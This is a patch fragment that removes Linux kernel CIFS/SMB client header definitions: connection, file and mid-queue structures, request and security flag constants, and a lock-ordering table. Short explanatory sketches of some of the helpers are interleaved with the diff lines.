+-	struct list_head rlist; /* reconnect list */
+-	spinlock_t tc_lock;  /* protect anything here that is not protected */
+-	atomic_t num_local_opens;  /* num of all opens including disconnected */
+-	atomic_t num_remote_opens; /* num of all network opens on server */
+-	struct list_head openFileList;
+-	spinlock_t open_file_lock; /* protects list above */
+-	struct cifs_ses *ses;	/* pointer to session associated with */
+-	char tree_name[MAX_TREE_SIZE + 1]; /* UNC name of resource in ASCII */
+-	char *nativeFileSystem;
+-	char *password;		/* for share-level security */
+-	__u32 tid;		/* The 4 byte tree id */
+-	__u16 Flags;		/* optional support bits */
+-	enum tid_status_enum status;
+-	atomic_t num_smbs_sent;
+-	union {
+-		struct {
+-			atomic_t num_writes;
+-			atomic_t num_reads;
+-			atomic_t num_flushes;
+-			atomic_t num_oplock_brks;
+-			atomic_t num_opens;
+-			atomic_t num_closes;
+-			atomic_t num_deletes;
+-			atomic_t num_mkdirs;
+-			atomic_t num_posixopens;
+-			atomic_t num_posixmkdirs;
+-			atomic_t num_rmdirs;
+-			atomic_t num_renames;
+-			atomic_t num_t2renames;
+-			atomic_t num_ffirst;
+-			atomic_t num_fnext;
+-			atomic_t num_fclose;
+-			atomic_t num_hardlinks;
+-			atomic_t num_symlinks;
+-			atomic_t num_locks;
+-			atomic_t num_acl_get;
+-			atomic_t num_acl_set;
+-		} cifs_stats;
+-		struct {
+-			atomic_t smb2_com_sent[NUMBER_OF_SMB2_COMMANDS];
+-			atomic_t smb2_com_failed[NUMBER_OF_SMB2_COMMANDS];
+-		} smb2_stats;
+-	} stats;
+-	__u64    bytes_read;
+-	__u64    bytes_written;
+-	spinlock_t stat_lock;  /* protects the two fields above */
+-	FILE_SYSTEM_DEVICE_INFO fsDevInfo;
+-	FILE_SYSTEM_ATTRIBUTE_INFO fsAttrInfo; /* ok if fs name truncated */
+-	FILE_SYSTEM_UNIX_INFO fsUnixInfo;
+-	bool ipc:1;   /* set if connection to IPC$ share (always also pipe) */
+-	bool pipe:1;  /* set if connection to pipe share */
+-	bool print:1; /* set if connection to printer share */
+-	bool retry:1;
+-	bool nocase:1;
+-	bool nohandlecache:1; /* can turn off if server has resource problems with handle caching */
+-	bool nodelete:1;
+-	bool seal:1;      /* transport encryption for this mounted share */
+-	bool unix_ext:1;  /* if false disable Linux extensions to CIFS protocol
+-				for this mount even if server would support */
+-	bool posix_extensions; /* if true SMB3.11 posix extensions enabled */
+-	bool local_lease:1; /* check leases (only) on local system not remote */
+-	bool broken_posix_open; /* e.g. Samba server versions < 3.3.2, 3.2.9 */
+-	bool broken_sparse_sup; /* if server or share does not support sparse */
+-	bool need_reconnect:1; /* connection reset, tid now invalid */
+-	bool need_reopen_files:1; /* need to reopen tcon file handles */
+-	bool use_resilient:1; /* use resilient instead of durable handles */
+-	bool use_persistent:1; /* use persistent instead of durable handles */
+-	bool no_lease:1;    /* Do not request leases on files or directories */
+-	bool use_witness:1; /* use witness protocol */
+-	__le32 capabilities;
+-	__u32 share_flags;
+-	__u32 maximal_access;
+-	__u32 vol_serial_number;
+-	__le64 vol_create_time;
+-	__u64 snapshot_time; /* for timewarp tokens - timestamp of snapshot */
+-	__u32 handle_timeout; /* persistent and durable handle timeout in ms */
+-	__u32 ss_flags;		/* sector size flags */
+-	__u32 perf_sector_size; /* best sector size for perf */
+-	__u32 max_chunks;
+-	__u32 max_bytes_chunk;
+-	__u32 max_bytes_copy;
+-#ifdef CONFIG_CIFS_FSCACHE
+-	u64 resource_id;		/* server resource id */
+-	struct fscache_volume *fscache;	/* cookie for share */
+-#endif
+-	struct list_head pending_opens;	/* list of incomplete opens */
+-	struct cached_fids *cfids;
+-	/* BB add field for back pointer to sb struct(s)? */
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	struct list_head ulist; /* cache update list */
+-#endif
+-	struct delayed_work	query_interfaces; /* query interfaces workqueue job */
+-};
+-
+-/*
+- * This is a refcounted and timestamped container for a tcon pointer. The
+- * container holds a tcon reference. It is considered safe to free one of
+- * these when the tl_count goes to 0. The tl_time is the time of the last
+- * "get" on the container.
+- */
+-struct tcon_link {
+-	struct rb_node		tl_rbnode;
+-	kuid_t			tl_uid;
+-	unsigned long		tl_flags;
+-#define TCON_LINK_MASTER	0
+-#define TCON_LINK_PENDING	1
+-#define TCON_LINK_IN_TREE	2
+-	unsigned long		tl_time;
+-	atomic_t		tl_count;
+-	struct cifs_tcon	*tl_tcon;
+-};
+-
+-extern struct tcon_link *cifs_sb_tlink(struct cifs_sb_info *cifs_sb);
+-extern void smb3_free_compound_rqst(int num_rqst, struct smb_rqst *rqst);
+-
+-static inline struct cifs_tcon *
+-tlink_tcon(struct tcon_link *tlink)
+-{
+-	return tlink->tl_tcon;
+-}
+-
+-static inline struct tcon_link *
+-cifs_sb_master_tlink(struct cifs_sb_info *cifs_sb)
+-{
+-	return cifs_sb->master_tlink;
+-}
+-
+-extern void cifs_put_tlink(struct tcon_link *tlink);
+-
+-static inline struct tcon_link *
+-cifs_get_tlink(struct tcon_link *tlink)
+-{
+-	if (tlink && !IS_ERR(tlink))
+-		atomic_inc(&tlink->tl_count);
+-	return tlink;
+-}
+-
+-/* This function is always expected to succeed */
+-extern struct cifs_tcon *cifs_sb_master_tcon(struct cifs_sb_info *cifs_sb);
+-
+-#define CIFS_OPLOCK_NO_CHANGE 0xfe
+-
+-struct cifs_pending_open {
+-	struct list_head olist;
+-	struct tcon_link *tlink;
+-	__u8 lease_key[16];
+-	__u32 oplock;
+-};
+-
+-struct cifs_deferred_close {
+-	struct list_head dlist;
+-	struct tcon_link *tlink;
+-	__u16  netfid;
+-	__u64  persistent_fid;
+-	__u64  volatile_fid;
+-};
+-
+-/*
+- * This info hangs off the cifsFileInfo structure, pointed to by llist.
+- * This is used to track byte stream locks on the file
+- */
+-struct cifsLockInfo {
+-	struct list_head llist;	/* pointer to next cifsLockInfo */
+-	struct list_head blist; /* pointer to locks blocked on this */
+-	wait_queue_head_t block_q;
+-	__u64 offset;
+-	__u64 length;
+-	__u32 pid;
+-	__u16 type;
+-	__u16 flags;
+-};
+-
+-/*
+- * One of these for each open instance of a file
+- */
+-struct cifs_search_info {
+-	loff_t index_of_last_entry;
+-	__u16 entries_in_buffer;
+-	__u16 info_level;
+-	__u32 resume_key;
+-	char *ntwrk_buf_start;
+-	char *srch_entries_start;
+-	char *last_entry;
+-	const char *presume_name;
+-	unsigned int resume_name_len;
+-	bool endOfSearch:1;
+-	bool emptyDir:1;
+-	bool unicode:1;
+-	bool smallBuf:1; /* so we know which buf_release function to call */
+-};
+-
+-#define ACL_NO_MODE	((umode_t)(-1))
+-struct cifs_open_parms {
+-	struct cifs_tcon *tcon;
+-	struct cifs_sb_info *cifs_sb;
+-	int disposition;
+-	int desired_access;
+-	int create_options;
+-	const char *path;
+-	struct cifs_fid *fid;
+-	umode_t mode;
+-	bool reconnect:1;
+-};
+-
+-struct cifs_fid {
+-	__u16 netfid;
+-	__u64 persistent_fid;	/* persist file id for smb2 */
+-	__u64 volatile_fid;	/* volatile file id for smb2 */
+-	__u8 lease_key[SMB2_LEASE_KEY_SIZE];	/* lease key for smb2 */
+-	__u8 create_guid[16];
+-	__u32 access;
+-	struct cifs_pending_open *pending_open;
+-	unsigned int epoch;
+-#ifdef CONFIG_CIFS_DEBUG2
+-	__u64 mid;
+-#endif /* CIFS_DEBUG2 */
+-	bool purge_cache;
+-};
+-
+-struct cifs_fid_locks {
+-	struct list_head llist;
+-	struct cifsFileInfo *cfile;	/* fid that owns locks */
+-	struct list_head locks;		/* locks held by fid above */
+-};
+-
+-struct cifsFileInfo {
+-	/* following two lists are protected by tcon->open_file_lock */
+-	struct list_head tlist;	/* pointer to next fid owned by tcon */
+-	struct list_head flist;	/* next fid (file instance) for this inode */
+-	/* lock list below protected by cifsi->lock_sem */
+-	struct cifs_fid_locks *llist;	/* brlocks held by this fid */
+-	kuid_t uid;		/* allows finding which FileInfo structure */
+-	__u32 pid;		/* process id who opened file */
+-	struct cifs_fid fid;	/* file id from remote */
+-	struct list_head rlist; /* reconnect list */
+-	/* BB add lock scope info here if needed */
+-	/* lock scope id (0 if none) */
+-	struct dentry *dentry;
+-	struct tcon_link *tlink;
+-	unsigned int f_flags;
+-	bool invalidHandle:1;	/* file closed via session abend */
+-	bool swapfile:1;
+-	bool oplock_break_cancelled:1;
+-	unsigned int oplock_epoch; /* epoch from the lease break */
+-	__u32 oplock_level; /* oplock/lease level from the lease break */
+-	int count;
+-	spinlock_t file_info_lock; /* protects four flag/count fields above */
+-	struct mutex fh_mutex; /* prevents reopen race after dead ses*/
+-	struct cifs_search_info srch_inf;
+-	struct work_struct oplock_break; /* work for oplock breaks */
+-	struct work_struct put; /* work for the final part of _put */
+-	struct delayed_work deferred;
+-	bool deferred_close_scheduled; /* Flag to indicate close is scheduled */
+-	char *symlink_target;
+-};
+-
+-struct cifs_io_parms {
+-	__u16 netfid;
+-	__u64 persistent_fid;	/* persist file id for smb2 */
+-	__u64 volatile_fid;	/* volatile file id for smb2 */
+-	__u32 pid;
+-	__u64 offset;
+-	unsigned int length;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-};
+-
+-struct cifs_aio_ctx {
+-	struct kref		refcount;
+-	struct list_head	list;
+-	struct mutex		aio_mutex;
+-	struct completion	done;
+-	struct iov_iter		iter;
+-	struct kiocb		*iocb;
+-	struct cifsFileInfo	*cfile;
+-	struct bio_vec		*bv;
+-	loff_t			pos;
+-	unsigned int		npages;
+-	ssize_t			rc;
+-	unsigned int		len;
+-	unsigned int		total_len;
+-	bool			should_dirty;
+-	/*
+-	 * Indicates if this aio_ctx is for direct_io,
+-	 * If yes, iter is a copy of the user passed iov_iter
+-	 */
+-	bool			direct_io;
+-};
+-
+-/* asynchronous read support */
+-struct cifs_readdata {
+-	struct kref			refcount;
+-	struct list_head		list;
+-	struct completion		done;
+-	struct cifsFileInfo		*cfile;
+-	struct address_space		*mapping;
+-	struct cifs_aio_ctx		*ctx;
+-	__u64				offset;
+-	unsigned int			bytes;
+-	unsigned int			got_bytes;
+-	pid_t				pid;
+-	int				result;
+-	struct work_struct		work;
+-	int (*read_into_pages)(struct TCP_Server_Info *server,
+-				struct cifs_readdata *rdata,
+-				unsigned int len);
+-	int (*copy_into_pages)(struct TCP_Server_Info *server,
+-				struct cifs_readdata *rdata,
+-				struct iov_iter *iter);
+-	struct kvec			iov[2];
+-	struct TCP_Server_Info		*server;
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	struct smbd_mr			*mr;
+-#endif
+-	unsigned int			pagesz;
+-	unsigned int			page_offset;
+-	unsigned int			tailsz;
+-	struct cifs_credits		credits;
+-	unsigned int			nr_pages;
+-	struct page			**pages;
+-};
+-
+-/* asynchronous write support */
+-struct cifs_writedata {
+-	struct kref			refcount;
+-	struct list_head		list;
+-	struct completion		done;
+-	enum writeback_sync_modes	sync_mode;
+-	struct work_struct		work;
+-	struct cifsFileInfo		*cfile;
+-	struct cifs_aio_ctx		*ctx;
+-	__u64				offset;
+-	pid_t				pid;
+-	unsigned int			bytes;
+-	int				result;
+-	struct TCP_Server_Info		*server;
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	struct smbd_mr			*mr;
+-#endif
+-	unsigned int			pagesz;
+-	unsigned int			page_offset;
+-	unsigned int			tailsz;
+-	struct cifs_credits		credits;
+-	unsigned int			nr_pages;
+-	struct page			**pages;
+-};
+-
+-/*
+- * Take a reference on the file private data. Must be called with
+- * cfile->file_info_lock held.
+- */
+-static inline void
+-cifsFileInfo_get_locked(struct cifsFileInfo *cifs_file)
+-{
+-	++cifs_file->count;
+-}
+-
+-struct cifsFileInfo *cifsFileInfo_get(struct cifsFileInfo *cifs_file);
+-void _cifsFileInfo_put(struct cifsFileInfo *cifs_file, bool wait_oplock_hdlr,
+-		       bool offload);
+-void cifsFileInfo_put(struct cifsFileInfo *cifs_file);
+-
+-#define CIFS_CACHE_READ_FLG	1
+-#define CIFS_CACHE_HANDLE_FLG	2
+-#define CIFS_CACHE_RH_FLG	(CIFS_CACHE_READ_FLG | CIFS_CACHE_HANDLE_FLG)
+-#define CIFS_CACHE_WRITE_FLG	4
+-#define CIFS_CACHE_RW_FLG	(CIFS_CACHE_READ_FLG | CIFS_CACHE_WRITE_FLG)
+-#define CIFS_CACHE_RHW_FLG	(CIFS_CACHE_RW_FLG | CIFS_CACHE_HANDLE_FLG)
+-
+-#define CIFS_CACHE_READ(cinode) ((cinode->oplock & CIFS_CACHE_READ_FLG) || (CIFS_SB(cinode->netfs.inode.i_sb)->mnt_cifs_flags & CIFS_MOUNT_RO_CACHE))
+-#define CIFS_CACHE_HANDLE(cinode) (cinode->oplock & CIFS_CACHE_HANDLE_FLG)
+-#define CIFS_CACHE_WRITE(cinode) ((cinode->oplock & CIFS_CACHE_WRITE_FLG) || (CIFS_SB(cinode->netfs.inode.i_sb)->mnt_cifs_flags & CIFS_MOUNT_RW_CACHE))
+-
+-/*
+- * One of these for each file inode
+- */
+-
+-struct cifsInodeInfo {
+-	struct netfs_inode netfs; /* Netfslib context and vfs inode */
+-	bool can_cache_brlcks;
+-	struct list_head llist;	/* locks held by this inode */
+-	/*
+-	 * NOTE: Some code paths call down_read(lock_sem) twice, so
+-	 * we must always use cifs_down_write() instead of down_write()
+-	 * for this semaphore to avoid deadlocks.
+-	 */
+-	struct rw_semaphore lock_sem;	/* protect the fields above */
+-	/* BB add in lists for dirty pages i.e. write caching info for oplock */
+-	struct list_head openFileList;
+-	spinlock_t	open_file_lock;	/* protects openFileList */
+-	__u32 cifsAttrs; /* e.g. DOS archive bit, sparse, compressed, system */
+-	unsigned int oplock;		/* oplock/lease level we have */
+-	unsigned int epoch;		/* used to track lease state changes */
+-#define CIFS_INODE_PENDING_OPLOCK_BREAK   (0) /* oplock break in progress */
+-#define CIFS_INODE_PENDING_WRITERS	  (1) /* Writes in progress */
+-#define CIFS_INODE_FLAG_UNUSED		  (2) /* Unused flag */
+-#define CIFS_INO_DELETE_PENDING		  (3) /* delete pending on server */
+-#define CIFS_INO_INVALID_MAPPING	  (4) /* pagecache is invalid */
+-#define CIFS_INO_LOCK			  (5) /* lock bit for synchronization */
+-#define CIFS_INO_MODIFIED_ATTR            (6) /* Indicate change in mtime/ctime */
+-#define CIFS_INO_CLOSE_ON_LOCK            (7) /* Not to defer the close when lock is set */
+-	unsigned long flags;
+-	spinlock_t writers_lock;
+-	unsigned int writers;		/* Number of writers on this inode */
+-	unsigned long time;		/* jiffies of last update of inode */
+-	u64  server_eof;		/* current file size on server -- protected by i_lock */
+-	u64  uniqueid;			/* server inode number */
+-	u64  createtime;		/* creation time on server */
+-	__u8 lease_key[SMB2_LEASE_KEY_SIZE];	/* lease key for this inode */
+-	struct list_head deferred_closes; /* list of deferred closes */
+-	spinlock_t deferred_lock; /* protection on deferred list */
+-	bool lease_granted; /* Flag to indicate whether lease or oplock is granted. */
+-	char *symlink_target;
+-};
+-
+-static inline struct cifsInodeInfo *
+-CIFS_I(struct inode *inode)
+-{
+-	return container_of(inode, struct cifsInodeInfo, netfs.inode);
+-}
+-
+-static inline struct cifs_sb_info *
+-CIFS_SB(struct super_block *sb)
+-{
+-	return sb->s_fs_info;
+-}
+-
+-static inline struct cifs_sb_info *
+-CIFS_FILE_SB(struct file *file)
+-{
+-	return CIFS_SB(file_inode(file)->i_sb);
+-}
+-
+-static inline char CIFS_DIR_SEP(const struct cifs_sb_info *cifs_sb)
+-{
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIX_PATHS)
+-		return '/';
+-	else
+-		return '\\';
+-}
+-
+-static inline void
+-convert_delimiter(char *path, char delim)
+-{
+-	char old_delim, *pos;
+-
+-	if (delim == '/')
+-		old_delim = '\\';
+-	else
+-		old_delim = '/';
+-
+-	pos = path;
+-	while ((pos = strchr(pos, old_delim)))
+-		*pos = delim;
+-}
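Usage sketch for the two path helpers above (the literal path and the cifs_sb variable are made up):

char path[] = "dir\\subdir\\file";

convert_delimiter(path, CIFS_DIR_SEP(cifs_sb));
/* with CIFS_MOUNT_POSIX_PATHS set: "dir/subdir/file";
 * otherwise the '\\' separators are left as-is */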
+-
+-#define cifs_stats_inc atomic_inc
+-
+-static inline void cifs_stats_bytes_written(struct cifs_tcon *tcon,
+-					    unsigned int bytes)
+-{
+-	if (bytes) {
+-		spin_lock(&tcon->stat_lock);
+-		tcon->bytes_written += bytes;
+-		spin_unlock(&tcon->stat_lock);
+-	}
+-}
+-
+-static inline void cifs_stats_bytes_read(struct cifs_tcon *tcon,
+-					 unsigned int bytes)
+-{
+-	spin_lock(&tcon->stat_lock);
+-	tcon->bytes_read += bytes;
+-	spin_unlock(&tcon->stat_lock);
+-}
+-
+-
+-/*
+- * This is the prototype for the mid receive function. This function is for
+- * receiving the rest of the SMB frame, starting with the WordCount (which is
+- * just after the MID in struct smb_hdr). Note:
+- *
+- * - This will be called by cifsd, with no locks held.
+- * - The mid will still be on the pending_mid_q.
+- * - mid->resp_buf will point to the current buffer.
+- *
+- * Returns zero on a successful receive, or an error. The receive state in
+- * the TCP_Server_Info will also be updated.
+- */
+-typedef int (mid_receive_t)(struct TCP_Server_Info *server,
+-			    struct mid_q_entry *mid);
+-
+-/*
+- * This is the prototype for the mid callback function. This is called once the
+- * mid has been received off of the socket. When creating one, take special
+- * care to avoid deadlocks. Things to bear in mind:
+- *
+- * - it will be called by cifsd, with no locks held
+- * - the mid will be removed from any lists
+- */
+-typedef void (mid_callback_t)(struct mid_q_entry *mid);
+-
+-/*
+- * This is the prototype for the mid handle function. This is called once the mid
+- * has been recognized after decryption of the message.
+- */
+-typedef int (mid_handle_t)(struct TCP_Server_Info *server,
+-			    struct mid_q_entry *mid);
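A minimal callback satisfying the mid_callback_t contract above: it runs in cifsd context with no locks held and the mid already off all lists, so it only signals a waiting thread (demo_mid_callback is a hypothetical example, not driver code):

static void demo_mid_callback(struct mid_q_entry *mid)
{
	struct completion *done = mid->callback_data;

	complete(done);	/* wake whoever queued this request */
}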
+-
+-/* one of these for every pending CIFS request to the server */
+-struct mid_q_entry {
+-	struct list_head qhead;	/* mids waiting on reply from this server */
+-	struct kref refcount;
+-	struct TCP_Server_Info *server;	/* server corresponding to this mid */
+-	__u64 mid;		/* multiplex id */
+-	__u16 credits;		/* number of credits consumed by this mid */
+-	__u16 credits_received;	/* number of credits from the response */
+-	__u32 pid;		/* process id */
+-	__u32 sequence_number;  /* for CIFS signing */
+-	unsigned long when_alloc;  /* when mid was created */
+-#ifdef CONFIG_CIFS_STATS2
+-	unsigned long when_sent; /* time when smb send finished */
+-	unsigned long when_received; /* when demux complete (taken off wire) */
+-#endif
+-	mid_receive_t *receive; /* call receive callback */
+-	mid_callback_t *callback; /* call completion callback */
+-	mid_handle_t *handle; /* call handle mid callback */
+-	void *callback_data;	  /* general purpose pointer for callback */
+-	struct task_struct *creator;
+-	void *resp_buf;		/* pointer to received SMB header */
+-	unsigned int resp_buf_size;
+-	int mid_state;	/* wish this were enum but can not pass to wait_event */
+-	unsigned int mid_flags;
+-	__le16 command;		/* smb command code */
+-	unsigned int optype;	/* operation type */
+-	bool large_buf:1;	/* if valid response, is pointer to large buf */
+-	bool multiRsp:1;	/* multiple trans2 responses for one request  */
+-	bool multiEnd:1;	/* both received */
+-	bool decrypted:1;	/* decrypted entry */
+-};
+-
+-struct close_cancelled_open {
+-	struct cifs_fid         fid;
+-	struct cifs_tcon        *tcon;
+-	struct work_struct      work;
+-	__u64 mid;
+-	__u16 cmd;
+-};
+-
+-/*	Make code in transport.c a little cleaner by moving
+-	updates of optional stats into the functions below */
+-static inline void cifs_in_send_inc(struct TCP_Server_Info *server)
+-{
+-	atomic_inc(&server->in_send);
+-}
+-
+-static inline void cifs_in_send_dec(struct TCP_Server_Info *server)
+-{
+-	atomic_dec(&server->in_send);
+-}
+-
+-static inline void cifs_num_waiters_inc(struct TCP_Server_Info *server)
+-{
+-	atomic_inc(&server->num_waiters);
+-}
+-
+-static inline void cifs_num_waiters_dec(struct TCP_Server_Info *server)
+-{
+-	atomic_dec(&server->num_waiters);
+-}
+-
+-#ifdef CONFIG_CIFS_STATS2
+-static inline void cifs_save_when_sent(struct mid_q_entry *mid)
+-{
+-	mid->when_sent = jiffies;
+-}
+-#else
+-static inline void cifs_save_when_sent(struct mid_q_entry *mid)
+-{
+-}
+-#endif
+-
+-/* for pending dnotify requests */
+-struct dir_notify_req {
+-	struct list_head lhead;
+-	__le16 Pid;
+-	__le16 PidHigh;
+-	__u16 Mid;
+-	__u16 Tid;
+-	__u16 Uid;
+-	__u16 netfid;
+-	__u32 filter; /* CompletionFilter (for multishot) */
+-	int multishot;
+-	struct file *pfile;
+-};
+-
+-struct dfs_info3_param {
+-	int flags; /* DFSREF_REFERRAL_SERVER, DFSREF_STORAGE_SERVER*/
+-	int path_consumed;
+-	int server_type;
+-	int ref_flag;
+-	char *path_name;
+-	char *node_name;
+-	int ttl;
+-};
+-
+-struct file_list {
+-	struct list_head list;
+-	struct cifsFileInfo *cfile;
+-};
+-
+-static inline void free_dfs_info_param(struct dfs_info3_param *param)
+-{
+-	if (param) {
+-		kfree(param->path_name);
+-		kfree(param->node_name);
+-	}
+-}
+-
+-static inline void free_dfs_info_array(struct dfs_info3_param *param,
+-				       int number_of_items)
+-{
+-	int i;
+-	if ((number_of_items == 0) || (param == NULL))
+-		return;
+-	for (i = 0; i < number_of_items; i++) {
+-		kfree(param[i].path_name);
+-		kfree(param[i].node_name);
+-	}
+-	kfree(param);
+-}
+-
+-static inline bool is_interrupt_error(int error)
+-{
+-	switch (error) {
+-	case -EINTR:
+-	case -ERESTARTSYS:
+-	case -ERESTARTNOHAND:
+-	case -ERESTARTNOINTR:
+-		return true;
+-	}
+-	return false;
+-}
+-
+-static inline bool is_retryable_error(int error)
+-{
+-	if (is_interrupt_error(error) || error == -EAGAIN)
+-		return true;
+-	return false;
+-}
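Typical decision ladder built on the two helpers above (do_send() and the retry label stand in for a real transmit path):

rc = do_send(server);
if (is_retryable_error(rc))
	goto retry;	/* -EINTR, -ERESTART..., or -EAGAIN */
if (rc)
	return rc;	/* hard error: surface it to the caller */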
+-
+-
+-/* cifs_get_writable_file() flags */
+-#define FIND_WR_ANY         0
+-#define FIND_WR_FSUID_ONLY  1
+-#define FIND_WR_WITH_DELETE 2
+-
+-#define   MID_FREE 0
+-#define   MID_REQUEST_ALLOCATED 1
+-#define   MID_REQUEST_SUBMITTED 2
+-#define   MID_RESPONSE_RECEIVED 4
+-#define   MID_RETRY_NEEDED      8 /* session closed while this request out */
+-#define   MID_RESPONSE_MALFORMED 0x10
+-#define   MID_SHUTDOWN		 0x20
+-
+-/* Flags */
+-#define   MID_WAIT_CANCELLED	 1 /* Cancelled while waiting for response */
+-#define   MID_DELETED            2 /* Mid has been dequeued/deleted */
+-
+-/* Types of response buffer returned from SendReceive2 */
+-#define   CIFS_NO_BUFFER        0    /* Response buffer not returned */
+-#define   CIFS_SMALL_BUFFER     1
+-#define   CIFS_LARGE_BUFFER     2
+-#define   CIFS_IOVEC            4    /* array of response buffers */
+-
+-/* Type of Request to SendReceive2 */
+-#define   CIFS_BLOCKING_OP      1    /* operation can block */
+-#define   CIFS_NON_BLOCKING     2    /* do not block waiting for credits */
+-#define   CIFS_TIMEOUT_MASK 0x003    /* only one of above set in req */
+-#define   CIFS_LOG_ERROR    0x010    /* log NT STATUS if non-zero */
+-#define   CIFS_LARGE_BUF_OP 0x020    /* large request buffer */
+-#define   CIFS_NO_RSP_BUF   0x040    /* no response buffer required */
+-
+-/* Type of request operation */
+-#define   CIFS_ECHO_OP            0x080  /* echo request */
+-#define   CIFS_OBREAK_OP          0x0100 /* oplock break request */
+-#define   CIFS_NEG_OP             0x0200 /* negotiate request */
+-#define   CIFS_CP_CREATE_CLOSE_OP 0x0400 /* compound create+close request */
+-/* Lower bitmask values are reserved by others below. */
+-#define   CIFS_SESS_OP            0x2000 /* session setup request */
+-#define   CIFS_OP_MASK            0x2780 /* mask request type */
+-
+-#define   CIFS_HAS_CREDITS        0x0400 /* already has credits */
+-#define   CIFS_TRANSFORM_REQ      0x0800 /* transform request before sending */
+-#define   CIFS_NO_SRV_RSP         0x1000 /* there is no server response */
+-
+-/* Security Flags: indicate type of session setup needed */
+-#define   CIFSSEC_MAY_SIGN	0x00001
+-#define   CIFSSEC_MAY_NTLMV2	0x00004
+-#define   CIFSSEC_MAY_KRB5	0x00008
+-#define   CIFSSEC_MAY_SEAL	0x00040 /* not supported yet */
+-#define   CIFSSEC_MAY_NTLMSSP	0x00080 /* raw ntlmssp with ntlmv2 */
+-
+-#define   CIFSSEC_MUST_SIGN	0x01001
+-/* note that only one of the following can be set, so the result of
+-setting MUST flags more than once is to require use of the strongest
+-of the requested mechanisms */
+-#define   CIFSSEC_MUST_NTLMV2	0x04004
+-#define   CIFSSEC_MUST_KRB5	0x08008
+-#ifdef CONFIG_CIFS_UPCALL
+-#define   CIFSSEC_MASK          0x8F08F /* flags supported if no weak allowed */
+-#else
+-#define	  CIFSSEC_MASK          0x87087 /* flags supported if no weak allowed */
+-#endif /* UPCALL */
+-#define   CIFSSEC_MUST_SEAL	0x40040 /* not supported yet */
+-#define   CIFSSEC_MUST_NTLMSSP	0x80080 /* raw ntlmssp with ntlmv2 */
+-
+-#define   CIFSSEC_DEF (CIFSSEC_MAY_SIGN | CIFSSEC_MAY_NTLMV2 | CIFSSEC_MAY_NTLMSSP)
+-#define   CIFSSEC_MAX (CIFSSEC_MUST_NTLMV2)
+-#define   CIFSSEC_AUTH_MASK (CIFSSEC_MAY_NTLMV2 | CIFSSEC_MAY_KRB5 | CIFSSEC_MAY_NTLMSSP)
+-/*
+- *****************************************************************
+- * All constants go here
+- *****************************************************************
+- */
+-
+-#define UID_HASH (16)
+-
+-/*
+- * Note that ONE module should define _DECLARE_GLOBALS_HERE to cause the
+- * following to be declared.
+- */
+-
+-/****************************************************************************
+- * Here are all the locks (spinlock, mutex, semaphore) in cifs.ko, arranged according
+- * to the locking order, i.e. if two locks are to be held together, the lock that
+- * appears higher in this list must be taken before the other.
+- *
+- * If you hold a lock that is lower in this list, and you need to take a higher lock
+- * (or if you think that one of the functions that you're calling may need to), first
+- * drop the lock you hold, pick up the higher lock, then the lower one. This will
+- * ensure that locks are picked up only in one direction in the below table
+- * (top to bottom).
+- *
+- * Also, if you expect a function to be called with a lock held, explicitly document
+- * this in the comments on top of your function definition.
+- *
+- * Also, try to keep critical sections (lock hold time) as short as possible.
+- * Blocking or calling other functions with a lock held always increases the
+- * risk of deadlock.
+- *
+- * Following this rule will avoid unnecessary deadlocks, which can get really hard to
+- * debug. Please add any new lock you introduce (or any existing lock missing from
+- * this list) in the position that matches its expected locking order.
+- *
+- * =====================================================================================
+- * Lock				Protects			Initialization fn
+- * =====================================================================================
+- * vol_list_lock
+- * vol_info->ctx_lock		vol_info->ctx
+- * cifs_sb_info->tlink_tree_lock	cifs_sb_info->tlink_tree	cifs_setup_cifs_sb
+- * TCP_Server_Info->		TCP_Server_Info			cifs_get_tcp_session
+- * reconnect_mutex
+- * TCP_Server_Info->srv_mutex	TCP_Server_Info			cifs_get_tcp_session
+- * cifs_ses->session_mutex		cifs_ses		sesInfoAlloc
+- *				cifs_tcon
+- * cifs_tcon->open_file_lock	cifs_tcon->openFileList		tconInfoAlloc
+- *				cifs_tcon->pending_opens
+- * cifs_tcon->stat_lock		cifs_tcon->bytes_read		tconInfoAlloc
+- *				cifs_tcon->bytes_written
+- * cifs_tcp_ses_lock		cifs_tcp_ses_list		sesInfoAlloc
+- * GlobalMid_Lock		GlobalMaxActiveXid		init_cifs
+- *				GlobalCurrentXid
+- *				GlobalTotalActiveXid
+- * TCP_Server_Info->srv_lock	(anything in struct not protected by another lock and can change)
+- * TCP_Server_Info->mid_lock	TCP_Server_Info->pending_mid_q	cifs_get_tcp_session
+- *				->CurrentMid
+- *				(any changes in mid_q_entry fields)
+- * TCP_Server_Info->req_lock	TCP_Server_Info->in_flight	cifs_get_tcp_session
+- *				->credits
+- *				->echo_credits
+- *				->oplock_credits
+- *				->reconnect_instance
+- * cifs_ses->ses_lock		(anything that is not protected by another lock and can change)
+- * cifs_ses->iface_lock		cifs_ses->iface_list		sesInfoAlloc
+- *				->iface_count
+- *				->iface_last_update
+- * cifs_ses->chan_lock		cifs_ses->chans
+- *				->chans_need_reconnect
+- *				->chans_in_reconnect
+- * cifs_tcon->tc_lock		(anything that is not protected by another lock and can change)
+- * cifsInodeInfo->open_file_lock	cifsInodeInfo->openFileList	cifs_alloc_inode
+- * cifsInodeInfo->writers_lock	cifsInodeInfo->writers		cifsInodeInfo_alloc
+- * cifsInodeInfo->lock_sem	cifsInodeInfo->llist		cifs_init_once
+- *				->can_cache_brlcks
+- * cifsInodeInfo->deferred_lock	cifsInodeInfo->deferred_closes	cifsInodeInfo_alloc
+- * cached_fid->fid_mutex		cifs_tcon->crfid		tconInfoAlloc
+- * cifsFileInfo->fh_mutex		cifsFileInfo			cifs_new_fileinfo
+- * cifsFileInfo->file_info_lock	cifsFileInfo->count		cifs_new_fileinfo
+- *				->invalidHandle			initiate_cifs_search
+- *				->oplock_break_cancelled
+- * cifs_aio_ctx->aio_mutex		cifs_aio_ctx			cifs_aio_ctx_alloc
+- ****************************************************************************/
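A sketch of the drop-and-reacquire rule described above, for a thread holding the lower tcon->tc_lock that discovers it needs the higher cifs_tcp_ses_lock (illustrative only):

spin_unlock(&tcon->tc_lock);	/* 1. drop the lower lock */
spin_lock(&cifs_tcp_ses_lock);	/* 2. take the higher lock first */
spin_lock(&tcon->tc_lock);	/* 3. re-take the lower lock */
/* ... both locks now held in table order ... */
spin_unlock(&tcon->tc_lock);
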